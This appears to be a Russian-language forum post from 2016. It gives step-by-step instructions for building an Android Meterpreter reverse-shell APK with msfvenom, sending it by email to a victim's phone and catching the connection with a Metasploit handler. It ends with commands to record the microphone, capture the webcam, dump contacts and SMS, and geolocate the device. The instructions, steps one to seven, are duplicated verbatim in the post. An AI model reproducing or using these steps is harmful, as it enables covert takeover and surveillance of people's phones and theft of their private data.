- 303
- 484
- 7 Июн 2016
Установка и использование msfvenom payload:
1. Запустите kali и откройте панель управления.
2. Установите payload и создайте всплывающее окно пользователя вот этой командой: msfvenom -p android/meterpreter/reverse_tcp LHOST=указываем свой ip LPORT=4444 R > android.apk
Файл apk сохранен в базовую папку.
3. Передайте/ отправьте по e-mail этот файл (android.apk) на телефон жертвы и запустите установку.
4. Запустите metasploit framework следующей командой: msfconsole
5. Теперь пора открыть и установить мульти-драйвер. Выполните следующие операции:
msf> usemulti/handler
msf exploit(handler)> set payload android/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST [свой ip]
msf exploit(handler)> set LPORT 4444
msf exploit(handler)> exploit
6. Когда жертва кликает на приложение ( установленное в меню телефона как основное действие ) запускается система удаленного управления.
7. Воспользуйтесь следующими командами просмотра:
1. Запустите kali и откройте панель управления.
2. Установите payload и создайте всплывающее окно пользователя вот этой командой: msfvenom -p android/meterpreter/reverse_tcp LHOST=указываем свой ip LPORT=4444 R > android.apk
Файл apk сохранен в базовую папку.
3. Передайте/ отправьте по e-mail этот файл (android.apk) на телефон жертвы и запустите установку.
4. Запустите metasploit framework следующей командой: msfconsole
5. Теперь пора открыть и установить мульти-драйвер. Выполните следующие операции:
msf> usemulti/handler
msf exploit(handler)> set payload android/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST [свой ip]
msf exploit(handler)> set LPORT 4444
msf exploit(handler)> exploit
6. Когда жертва кликает на приложение ( установленное в меню телефона как основное действие ) запускается система удаленного управления.
7. Воспользуйтесь следующими командами просмотра:
- record_mic
- webcam_snap
- webcam_stream
- dump_contacts
- dump_sms
- geolocate
Последнее редактирование: